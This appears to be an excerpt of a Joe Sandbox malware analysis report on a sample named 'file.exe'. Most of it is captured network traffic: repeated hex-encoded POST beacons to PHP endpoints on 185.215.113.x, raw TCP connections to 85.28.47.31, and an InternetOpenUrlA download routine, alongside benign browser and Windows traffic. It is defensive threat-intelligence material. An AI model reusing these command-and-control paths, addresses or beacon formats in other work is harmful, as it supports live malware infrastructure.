Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3

Source: Joe Sandbox View

ASN Name: GES-ASRU GES-ASRU

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1p5G+81pvP7punU&MD=N3O13Xaa HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1p5G+81pvP7punU&MD=N3O13Xaa HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722622217&P2=404&P3=2&P4=HRMAGmFP8EnBZRt3MBzrWkGoEL886HyLUTisCaE9WLiFCc98%2b6UZVpkmckHSlQ4wxX7sFV9VZU%2fvGxngRqL8XA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: CsGSn4HudrHHhUu1O19xTfSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=6686581979505309747&ACHANNEL=4&ABUILD=117.0.5938.132&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=132 HTTP/1.1Host: arc.msn.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-812259498&timestamp=1722017421427 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: 